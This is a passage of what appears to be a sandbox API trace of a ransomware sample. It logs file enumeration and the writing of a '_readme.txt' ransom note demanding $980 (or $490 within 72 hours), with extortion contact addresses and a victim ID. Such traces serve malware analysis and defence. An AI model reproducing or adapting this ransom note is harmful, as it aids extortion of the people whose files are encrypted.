lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.415] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0227.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.415] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.415] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.415] PathFindFileNameW (pszPath="") returned="" [0227.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.415] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.415] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.416] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.416] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.416] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.416] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0227.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.417] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.417] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.418] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.418] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.418] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.419] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.419] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.419] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.419] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.423] 